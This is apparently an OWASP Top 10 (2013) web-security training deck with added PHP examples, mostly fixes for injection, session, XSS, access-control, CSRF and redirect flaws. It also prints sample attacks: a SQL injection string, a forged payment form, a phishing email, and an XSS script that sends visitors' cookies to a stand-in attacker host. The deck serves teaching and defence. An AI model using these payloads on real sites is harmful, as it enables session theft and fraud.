
Forecepts Technical Sharing OWASP 2013

Sep 2013

What Do Hackers Want To Do?

Gain access to the website
Sabotage
Steal information

Security Impacts

Technical impact: data corruption, loss of credentials, malfunction, information leaking
Business impact: company image, legal issues

OWASP Top 10 (2013)

A1 Injection
A2 Broken Authentication and Session Management
A3 Cross-Site Scripting (XSS)
A4 Insecure Direct Object References
A5 Security Misconfiguration
A6 Sensitive Data Exposure
A7 Missing Function Level Access Control
A8 Cross-Site Request Forgery (CSRF)
A9 Using Components with Known Vulnerabilities
A10 Unvalidated Redirects and Forwards

A1 Injection

A1 Injection Prevention

Use PARAMETERS: bind values with prepared statements, never concatenate them into the query text
Validate inputs (reject anything that does not match the expected shape before it reaches the query)
SCAN!!
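The same product lookup written both ways, as an added example (not code from the deck or from Forecepts); the table, rows and function names are constructed for the demo and an in-memory SQLite database stands in for the real one:

```php
<?php
// Added example, not code from the deck: the same lookup written with string
// concatenation and with a PDO prepared statement. The product table and rows
// are constructed here (in-memory SQLite) so the script runs offline.

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE product (id INTEGER PRIMARY KEY, name TEXT, price INTEGER)');
$db->exec("INSERT INTO product VALUES (50, 'Phone', 299), (51, 'Laptop', 1299)");

// Vulnerable: ?id= is pasted into the SQL text, so a quote in it rewrites the query.
function findProductUnsafe(PDO $db, string $id): array
{
    $sql = "SELECT id, name FROM product WHERE id = '" . $id . "'";
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Fixed: the value is bound as a parameter; whatever it contains is data, not SQL.
function findProductSafe(PDO $db, string $id): array
{
    $stmt = $db->prepare('SELECT id, name FROM product WHERE id = :id');
    $stmt->execute([':id' => $id]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Belt and braces: validate the shape of the input before it is used at all.
function handleRequest(PDO $db, array $get): array
{
    $id = $get['id'] ?? '';
    if (!ctype_digit($id)) {          // product ids are digits only
        return [];
    }
    return findProductSafe($db, $id);
}

$payload = "50' OR '1'='1";          // what an attacker puts after ?id=
echo count(findProductUnsafe($db, $payload)), " rows from the concatenated query\n";
echo count(findProductSafe($db, $payload)),   " rows from the prepared statement\n";
echo count(handleRequest($db, ['id' => $payload])), " rows after input validation\n";
echo count(handleRequest($db, ['id' => '50'])),     " row for a genuine id\n";
```

The concatenated query becomes `WHERE id = '50' OR '1'='1'` and returns every product; the prepared statement compares the column against the literal string and matches nothing, and the validated path never reaches the database at all.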

A2 Broken Authentication and Session Management

Scenario #1 Session ID in the URL. Jared is logged in and his session ID is part of the page address:

buy.com/product.php?id=50&PHPSSID=3289434

He sends the link to Jobs: "Jobs, look at this product, they only sell $299". Jobs opens it and is greeted with "Welcome Jared [Logout]". Ah ha! Jobs is now inside Jared's session and can press Buy Now on Jared's account.

A2 Broken Authentication and Session Management


Scenario #2 Application timeouts aren't set properly. A user uses a public computer to access the site. Instead of selecting logout, the user simply closes the browser tab and walks away. An attacker uses the same browser an hour later, and that browser is still authenticated.

A2 Broken Authentication and Session Management


Scenario #3 Password stored in clear text

A2 Broken Authentication and Session Management - Prevention

No cookie-less sessions (never carry the session ID in the URL, and issue a new ID after login)
Timeout mechanism (expire idle sessions server side; closing a tab is not a logout)
Password hashing: store a salted, slow hash (bcrypt or similar) rather than clear text or a reversible "encryption"
SCAN!!
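Session handling that closes all three scenarios, as an added example (not code from the deck or from Forecepts); the 15-minute idle limit, the function names and the user table are choices made for this demo:

```php
<?php
// Added example, not code from the deck: session handling that closes the
// three A2 scenarios. The 15-minute idle limit and the user table are
// choices made for this demo.

const IDLE_LIMIT = 15 * 60;   // seconds without a request before the session is dropped

function startSecureSession(): void
{
    // Scenario #1: the session ID travels only in a cookie, never in the URL,
    // so a forwarded link like product.php?id=50&PHPSSID=... carries no login.
    ini_set('session.use_only_cookies', '1');
    ini_set('session.use_trans_sid', '0');
    ini_set('session.use_strict_mode', '1');   // IDs the server never issued are rejected (anti-fixation)
    session_set_cookie_params([
        'httponly' => true,    // document.cookie cannot read it (blunts the A3 cookie-theft payload)
        'secure'   => true,    // sent over HTTPS only
        'samesite' => 'Lax',
    ]);
    session_start();

    // Scenario #2: closing the tab does not log out, so the server expires idle sessions.
    if (isset($_SESSION['last_seen']) && time() - $_SESSION['last_seen'] > IDLE_LIMIT) {
        session_unset();
        session_destroy();
        session_start();   // continue as an anonymous visitor
    }
    $_SESSION['last_seen'] = time();
}

function login(string $username, string $password, array $users): bool
{
    // Scenario #3: the table holds password_hash() output (salted, slow), never clear text.
    if (!isset($users[$username]) || !password_verify($password, $users[$username])) {
        return false;
    }
    session_regenerate_id(true);   // fresh ID after login, so a pre-login ID is worthless
    $_SESSION['user'] = $username;
    return true;
}

// Constructed user table: what signup stored for Jared.
$users = ['jared' => password_hash('correct horse battery', PASSWORD_DEFAULT)];

startSecureSession();
echo login('jared', 'correct horse battery', $users) ? "login ok\n" : "login failed\n";
echo login('jared', 'wrong password', $users)        ? "login ok\n" : "login failed\n";
```

The ini settings must be applied before `session_start()`; in a real deployment put them in php.ini so no script can forget them. Add an absolute lifetime as well as the idle limit if the site handles money.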

A3 Cross-Site Scripting (XSS)

My Wonder Page, comment box. A visitor submits this as a comment:

<script type="text/javascript">location.href = "http://www.playboy.com";</script>

If the comment is echoed back into the page unescaped, every visitor's browser runs it and is redirected.

A3 Cross-Site Scripting (XSS)

Same comment box, a nastier comment:

<script type="text/javascript">location.href = "http://www.hackerside.com?cookie_id=" + document.cookie;</script>

Each visitor's cookies, session ID included, are sent to the hacker's site.

A3 Cross-Site Scripting (XSS) Prevention

Escape output data for the context it is rendered in (HTML body, attribute, JavaScript, URL)
Validate input
Plan input handling properly
SCAN!!
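Output escaping for the comment box, as an added example (not code from the deck or from Forecepts); the helper names and the 2000-character limit are choices for this demo, and the two payloads are the ones from the slides:

```php
<?php
// Added example, not code from the deck: rendering a comment with and without
// output escaping, plus a minimal input check. e(), validateComment() and the
// render functions are names chosen for this demo.

// Escape for an HTML body or attribute context. ENT_QUOTES covers both quote
// styles; ENT_SUBSTITUTE keeps invalid UTF-8 from turning the output into an
// empty string, which would silently swallow a comment instead of rejecting it.
function e(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Validate input: well-formed UTF-8 and a sane length. Validation is not a
// substitute for escaping; it just narrows what reaches the page.
function validateComment(string $comment): bool
{
    return mb_check_encoding($comment, 'UTF-8') && mb_strlen($comment, 'UTF-8') <= 2000;
}

// Vulnerable: the comment is inserted as raw HTML, so a <script> tag executes.
function renderCommentUnsafe(string $comment): string
{
    return '<div class="comment">' . $comment . '</div>';
}

// Fixed: the comment can only ever be text; < and " become &lt; and &quot;.
function renderCommentSafe(string $comment): string
{
    return '<div class="comment">' . e($comment) . '</div>';
}

$payloads = [
    '<script type="text/javascript">location.href = "http://www.playboy.com";</script>',
    '<script type="text/javascript">location.href = "http://www.hackerside.com?cookie_id=" + document.cookie;</script>',
];

foreach ($payloads as $p) {
    if (!validateComment($p)) {
        continue;                             // a script tag is valid UTF-8, so this alone does not stop it
    }
    echo renderCommentUnsafe($p), "\n";       // a browser would execute this
    echo renderCommentSafe($p), "\n";         // a browser displays the tag as literal text
}
```

`htmlspecialchars` is right for HTML body and attribute contexts only; a value placed inside a `<script>` block or a URL needs its own encoder for that context.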

A4 Insecure Direct Object References

Jennette logs in (username jennette, password *******) and lands on:

www.abcfinance.com/viewprofile.php?id=50
Welcome back Jennette Tan

She changes the id in the address bar:

www.abcfinance.com/viewprofile.php?id=30
Welcome back Peter Lim

The id is a direct database key and nothing checks that the profile belongs to the logged-in user.

A4 Insecure Direct Object References

If directory listing is not turned off, files under userfiles/ that are supposed to be accessible only to their owners are exposed to everyone who can guess the folder.

A4 Insecure Direct Object References

Httpdocs/lib/MyBizClass.class.php

What if I access http://www.abc.com/lib/MyBizClass.class.php directly? Library code under the document root can be requested by anyone: run outside its intended context it may throw revealing errors or trigger side effects, and if the server ever mishandles PHP it serves the source.

A4 Insecure Direct Object References - Prevention

Scan NOT AVAILABLE: scanners cannot tell whose profile id=30 is, so this is a design and code-review job
PLAN, PLAN, PLAN
Be careful of AJAX! (the endpoints behind AJAX calls need the same ownership checks as the pages)
Block direct access (keep libraries outside the web root, or deny them in the server configuration)
Control your file types
Be careful of log files / backup files left under the web root
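Two ways to stop viewprofile.php?id=30 from showing Peter's profile to Jennette, as an added example (not code from the deck or from Forecepts); the profile table, owner names and function names are constructed for this demo:

```php
<?php
// Added example, not code from the deck: an ownership check on a direct id,
// and an indirect reference map so the real id never appears in the URL.
// Profiles and owners are constructed for the demo.

$profiles = [
    30 => ['name' => 'Peter Lim',    'owner' => 'peter'],
    50 => ['name' => 'Jennette Tan', 'owner' => 'jennette'],
];

// Approach 1: keep the direct id but verify ownership on every request.
function viewProfile(array $profiles, string $currentUser, string $requestedId): ?array
{
    if (!ctype_digit($requestedId)) {             // validate the shape before use
        return null;
    }
    $profile = $profiles[(int) $requestedId] ?? null;
    if ($profile === null || $profile['owner'] !== $currentUser) {
        return null;                               // same answer for "missing" and "not yours"
    }
    return $profile;
}

// Approach 2: indirect references. The page only ever sees a random per-session
// token; the mapping back to the real id lives server side in the session.
function makeReference(array &$session, int $realId): string
{
    $token = bin2hex(random_bytes(16));
    $session['refs'][$token] = $realId;
    return $token;
}

function resolveReference(array $session, string $token): ?int
{
    return $session['refs'][$token] ?? null;       // a token this session never issued resolves to nothing
}

// Jennette is logged in and edits the id by hand.
$own      = viewProfile($profiles, 'jennette', '50');
$peters   = viewProfile($profiles, 'jennette', '30');
$garbage  = viewProfile($profiles, 'jennette', '30 OR 1');
echo 'own profile: ',    $own     ? $own['name'] : 'refused', "\n";
echo "Peter's profile: ", $peters  ? $peters['name'] : 'refused', "\n";
echo 'malformed id: ',   $garbage ? $garbage['name'] : 'refused', "\n";

$session = [];
$ref = makeReference($session, 50);
echo 'issued token resolves to ', var_export(resolveReference($session, $ref), true), "\n";
echo 'guessed token resolves to ', var_export(resolveReference($session, 'deadbeef'), true), "\n";
```

Returning the same "not found" for a missing profile and for someone else's profile keeps an attacker from enumerating which ids exist.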

A5 Security Misconfiguration

Default DB password
Direct DB access (database port reachable from outside the application host)
Directory listing
Exposed stack trace (display_errors left on in production)

A5 Security Misconfiguration

Work closely with hosting
SCAN!!

A6 Sensitive Data Exposure

Sensitive data stored in clear text
Missing SSL while transmitting sensitive data
Unsalted hash / hash without key

A6 Sensitive Data Exposure Prevention

NEVER keep sensitive files where the public can reach them
ENCRYPT, ENCRYPT, ENCRYPT (authenticated encryption with a key kept apart from the data)
SSL for every page that carries sensitive data, not just the login form
Disable form autocomplete on sensitive fields
SCAN!!
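Encrypting a field you need to read back later, as an added example (not code from the deck or from Forecepts); the card number and the key are constructed for the demo, and `encryptField`/`decryptField` are names chosen here. Passwords are the one thing not to do this with: they are hashed, not encrypted, because nothing ever needs the original back.

```php
<?php
// Added example, not code from the deck: authenticated encryption for a
// sensitive field at rest, using libsodium's secretbox (XSalsa20-Poly1305).
// The key is generated here for the demo; in production it comes from a
// vault or KMS, never from the code or the same database as the data.

function encryptField(string $plain, string $key): string
{
    // A fresh random nonce per record; stored alongside the ciphertext.
    $nonce = random_bytes(SODIUM_CRYPTO_SECRETBOX_NONCEBYTES);
    return base64_encode($nonce . sodium_crypto_secretbox($plain, $nonce, $key));
}

function decryptField(string $encoded, string $key): ?string
{
    $raw = base64_decode($encoded, true);
    if ($raw === false || strlen($raw) < SODIUM_CRYPTO_SECRETBOX_NONCEBYTES + SODIUM_CRYPTO_SECRETBOX_MACBYTES) {
        return null;                                   // not something we produced
    }
    $nonce  = substr($raw, 0, SODIUM_CRYPTO_SECRETBOX_NONCEBYTES);
    $cipher = substr($raw, SODIUM_CRYPTO_SECRETBOX_NONCEBYTES);
    $plain  = sodium_crypto_secretbox_open($cipher, $nonce, $key);
    // false means wrong key or tampered ciphertext: the MAC check failed, so
    // no partial or corrupted plaintext is ever returned.
    return $plain === false ? null : $plain;
}

// Constructed data for the demo.
$key  = sodium_crypto_secretbox_keygen();              // 32 random bytes
$card = encryptField('4111111111111111', $key);

echo 'stored value: ', $card, "\n";                    // what lands in the database column
echo 'with the right key: ', var_export(decryptField($card, $key), true), "\n";
echo 'with another key: ',   var_export(decryptField($card, sodium_crypto_secretbox_keygen()), true), "\n";

// One flipped byte in the stored value must also be rejected, not decrypted to garbage.
$tampered = base64_decode($card, true);
$tampered[strlen($tampered) - 1] = chr(ord($tampered[strlen($tampered) - 1]) ^ 0x01);
echo 'after tampering: ', var_export(decryptField(base64_encode($tampered), $key), true), "\n";
```

An unsalted or unkeyed hash of a card number is not protection: the input space is small enough to enumerate. Either encrypt it as above, or keep only the last four digits and let the payment processor hold the rest.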

A7 Missing Function Level Access Control

A normal user logs in (username normaluser, password *******) and is sent to:

www.abcfinance.com/member_listing.php
Welcome back Jennette Tan

The admin page is not linked anywhere in the menu, so the user types its address by hand:

www.abcfinance.com/user_management.php

The page loads. Hiding the link was the only "protection".


A7 Missing Function Level Access Control Prevention

LAZY is a SIN: check the caller's role on the server for every function, not just where the link is shown
Deny by default; a page not in the access table is served to nobody
Save trouble now, more trouble later
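A single authorization check run before any page is dispatched, as an added example (not code from the deck or from Forecepts); the role table, the role names and the function names are constructed for this demo:

```php
<?php
// Added example, not code from the deck: one deny-by-default authorization
// check in front of every page, so user_management.php is protected whether
// or not its link is visible. Roles and the page table are constructed here.

const PAGE_ROLES = [
    'index.php'           => ['guest', 'user', 'admin'],
    'member_listing.php'  => ['user', 'admin'],
    'user_management.php' => ['admin'],
];

function isAllowed(string $page, string $role): bool
{
    // Deny by default: a page missing from the table has no allowed roles.
    return in_array($role, PAGE_ROLES[$page] ?? [], true);
}

// The front controller: every request passes through here before any handler runs.
function dispatch(string $page, array $session): int
{
    $role = $session['role'] ?? 'guest';     // unauthenticated callers are guests
    if (!isAllowed($page, $role)) {
        return 403;                           // stop here; never require() the file first
    }
    // The real handler would be loaded only now, e.g.
    // require __DIR__ . '/pages/' . basename($page);
    return 200;
}

// Constructed sessions for the demo.
$normalUser = ['user' => 'normaluser', 'role' => 'user'];
$admin      = ['user' => 'jennette',   'role' => 'admin'];
$nobody     = [];

printf("%s %-25s -> %d\n", 'user ', 'member_listing.php',  dispatch('member_listing.php',  $normalUser));
printf("%s %-25s -> %d\n", 'user ', 'user_management.php', dispatch('user_management.php', $normalUser));
printf("%s %-25s -> %d\n", 'admin', 'user_management.php', dispatch('user_management.php', $admin));
printf("%s %-25s -> %d\n", 'guest', 'member_listing.php',  dispatch('member_listing.php',  $nobody));
printf("%s %-25s -> %d\n", 'user ', 'lib/MyBizClass.class.php', dispatch('lib/MyBizClass.class.php', $normalUser));
```

The check lives in one place so a new page cannot forget it; a page that is not yet in the table is simply not reachable until someone decides who may use it.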

A8 - Cross-Site Request Forgery (CSRF)

Website A: Jennette Tan is logged in ("Welcome back Jennette Tan").

Hacker website: a button that says "Click to Win $10000". The form behind it targets Process_payment.php on Website A and carries hidden fields:

<input type="hidden" name="terget_uid" value="109">
<input type="hidden" name="amount" value="9999">

(On the slide the form is inserted by the hacker using XSS.) When Jennette clicks, her browser sends the request with her Website A cookies, so Process_payment.php sees a logged-in Jennette paying 9999 to user 109.

A8 - Cross-Site Request Forgery (CSRF) Prevention

Use a token: an unguessable per-session value placed in every state-changing form and verified server side
SCAN!!
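Synchronizer-token protection for Process_payment.php, as an added example (not code from the deck or from Forecepts); the function names and the form field names (`target_uid`, `amount`, `csrf`) are chosen for this demo and the session is a plain array so it runs offline:

```php
<?php
// Added example, not code from the deck: a per-session anti-CSRF token that the
// real form carries and Process_payment.php verifies. Function and field names
// are choices for this demo; $session stands in for $_SESSION.

function csrfToken(array &$session): string
{
    if (empty($session['csrf'])) {
        $session['csrf'] = bin2hex(random_bytes(32));   // unguessable, one per session
    }
    return $session['csrf'];
}

// The legitimate payment form on Website A embeds the token.
function paymentForm(array &$session): string
{
    $token = htmlspecialchars(csrfToken($session), ENT_QUOTES, 'UTF-8');
    return '<form method="post" action="Process_payment.php">'
         . '<input type="hidden" name="csrf" value="' . $token . '">'
         . '<input type="text" name="target_uid">'
         . '<input type="text" name="amount">'
         . '<button>Pay</button></form>';
}

// Process_payment.php: refuse any POST whose token is missing or wrong.
function processPayment(array $session, array $post): string
{
    $expected = $session['csrf'] ?? '';
    $given    = (string) ($post['csrf'] ?? '');
    // hash_equals compares in constant time; an empty expected value can never match.
    if ($expected === '' || !hash_equals($expected, $given)) {
        return 'rejected: bad or missing CSRF token';
    }
    return sprintf('paid %d to uid %d', (int) $post['amount'], (int) $post['target_uid']);
}

$session = [];
paymentForm($session);                   // a normal page load issues the token

// Submission from the genuine form:
echo processPayment($session, ['csrf' => $session['csrf'], 'target_uid' => 7, 'amount' => 10]), "\n";

// The hacker's "Click to Win $10000" form: it cannot know the token.
echo processPayment($session, ['target_uid' => 109, 'amount' => 9999]), "\n";

// A guessed or stale token fails the same way.
echo processPayment($session, ['csrf' => str_repeat('0', 64), 'target_uid' => 109, 'amount' => 9999]), "\n";
```

A token stops forms hosted on another site. If the attacker can inject script into Website A itself (the XSS case the slide mentions), that script can read the token out of the page, so the XSS has to be fixed as well; the SameSite cookie attribute is a useful second layer, not a replacement for the token.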

A9 - Using Components with Known Vulnerabilities

Normally detectable by a vulnerability scanner
The hosting engineer needs to apply security patches regularly
Track the application's own libraries and frameworks too, not only the operating system packages the scanner sees

A10 Unvalidated Redirects and Forwards

The bank's site has a redirect page that accepts any destination:

www.citibank.com/redirect.php?url=XXXXXX

Hacker email:

Dear customer, we are running a campaign to update your bank credit card information. Participants will win a chance in a lucky draw for $10000.

www.citibank.com/redirect.php?url=hackersite.com/creditcard-form.php

The link starts with the bank's real domain, so it passes a glance and a phishing filter, and lands the customer on the hacker's form.

A10 Unvalidated Redirects and Forwards - Prevention

Validate the host of the redirect URL against an allow-list of your own hosts
Use numbers / codes that map to known URLs instead of accepting a URL at all
SCAN!!
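Both fixes for redirect.php, as an added example (not code from the deck or from Forecepts); the allow-list, the destination table and the function names are constructed for this demo, and the bank's hostname is the one used on the slide:

```php
<?php
// Added example, not code from the deck: validating a redirect target against
// an allow-list, and replacing the URL parameter with a lookup code.
// ALLOWED_HOSTS and DESTINATIONS are constructed for the demo.

const ALLOWED_HOSTS = ['www.citibank.com', 'online.citibank.com'];

// Fix 1: accept a URL, but only if it points at one of our own hosts (or is a
// site-relative path). Returns null for anything that should not be followed.
function safeRedirectUrl(string $url): ?string
{
    if (strpbrk($url, "\\\r\n") !== false) {      // backslash and CRLF tricks are never legitimate
        return null;
    }
    $parts = parse_url($url);
    if ($parts === false) {
        return null;
    }
    if (!isset($parts['host'])) {
        // No host: only a path starting with "/" stays on our site. "//evil.com"
        // parses as a host (handled below) and "javascript:..." has no leading slash.
        $path = $parts['path'] ?? '';
        return (isset($path[0]) && $path[0] === '/') ? $path : null;
    }
    if (!in_array(strtolower($parts['host']), ALLOWED_HOSTS, true)) {
        return null;                               // includes www.citibank.com.evil.com and user@host tricks
    }
    if (($parts['scheme'] ?? 'https') !== 'https') {
        return null;
    }
    return $url;                                   // caller does: header('Location: ' . $url)
}

// Fix 2: do not accept a URL at all; accept a code that maps to a fixed URL.
const DESTINATIONS = [
    1 => 'https://www.citibank.com/cards',
    2 => 'https://www.citibank.com/loans',
];

function redirectByCode(string $code): ?string
{
    return ctype_digit($code) ? (DESTINATIONS[(int) $code] ?? null) : null;
}

$candidates = [
    'https://www.citibank.com/cards',
    '/account',
    'http://hackersite.com/creditcard-form.php',
    '//hackersite.com/creditcard-form.php',           // protocol-relative
    'https://www.citibank.com.hackersite.com/',       // our name as a subdomain of theirs
    'https://www.citibank.com@hackersite.com/',       // our name as the userinfo part
    'javascript:alert(1)',
];
foreach ($candidates as $c) {
    printf("%-50s -> %s\n", $c, var_export(safeRedirectUrl($c), true));
}
printf("code 1  -> %s\n", var_export(redirectByCode('1'), true));
printf("code 99 -> %s\n", var_export(redirectByCode('99'), true));
```

Only the first two candidates survive the allow-list; the code-based version has no URL to tamper with at all, which is why the slide recommends it.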
